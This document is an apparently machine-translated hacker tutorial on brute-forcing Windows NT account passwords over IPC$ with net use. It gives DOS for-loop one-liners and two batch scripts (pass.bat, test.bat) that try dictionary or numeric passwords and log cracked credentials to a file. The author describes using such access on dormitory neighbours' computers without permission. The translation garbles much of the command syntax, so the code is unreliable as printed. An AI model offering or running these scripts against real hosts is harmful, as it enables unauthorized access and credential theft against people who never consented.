Use the doscommand to crack the remote NT user password

If you know an NT account and password, you can use

Net use \ host ipc $ "password"/user: "user"

Establish a connection with a remote host. This is a method that every hacker or friend who wants to become or is trying to become a hacker knows. I even know that I am not even a newbie, I only know this one, and I use the one I only know to access other people's computers in the dormitory network, because their computer passwords are empty, after being discovered by them, I had a chat, and then added the passwords. Now I'm done. I want to have a peek at their passwords. They have to work out other methods to prevent them, maybe you will use other methods, such as searching for a system, to get management permissions, but I cannot, because as I said before, I will only use that one, some people may say that they can use software to brute force crack passwords. It may be good, but first I don't have any advanced software and I don't have the talent to study complicated usage, however, some commands were found when I accidentally looked at the help of DOS. It was really impossible:

1. dictionary: for/f % I in (dictionary file) do net use \ host ipc $ "% I"/user: "user"
2. Number: for/l % I in (start, step, end) do net use \ host ipc $ "% I"
/User: "user"

For more information, see "for help" in DOS. Let me connect several machines, but the problem also arises. I still don't know the password when I connect them, you have to try it all again next time.


I was disappointed. I accidentally discovered another good method. Maybe I am too stupid. Maybe you are smarter. Maybe you have already discovered it and will not talk nonsense, all the methods are provided below. please correct me:


Save the following file as pass. bat:

@ Echo off
Echo
-------------------------------------------------------------------
> C: pass.txt
Echo
-------------------------------------------------------------------
> C: pass.txt
Date/t> c: pass.txt
Time/t> c: pass.txt
Echo cracking result:> c: pass.txt
If "% 6" = "1" goto shit2
: Shit1
Start "cracking"/min cmd/c for/f % I in (% 1) do call test. bat % 2
"% I" % 3
Goto quit
: Shit2
Start "cracking"/min cmd/c for/l % I in (% 1, % 2, % 3) do call test. bat
% 4 "% I" % 5
: Quit

Save the following file as test. bat:

Net use \ % 1ipc $ % 2/user: "% 3"
Goto answer % ERRORLEVEL %
Rem % ERRORLEVEL % indicates the result returned by the previous command execution. If the net use operation succeeds, 0 is returned, and if the operation fails, 2 is returned.
: Answer0
Echo remote host: "% 1"> c: pass.txt
Echo User: "% 3"> c: pass.txt
Echo password: % 2> c: pass.txt
Net use \ % 1ipc $/delet
Exit
: Answer2

Store pass. bat and test. bat in system32. The usage is as follows:
1. If you use dictionary cracking: pass. bat dictionary file path and name host User Name
2. If a number is used for cracking: pass. bat start count step ends count host username 1
After the password is cracked, it is stored in the c: pass.txt file.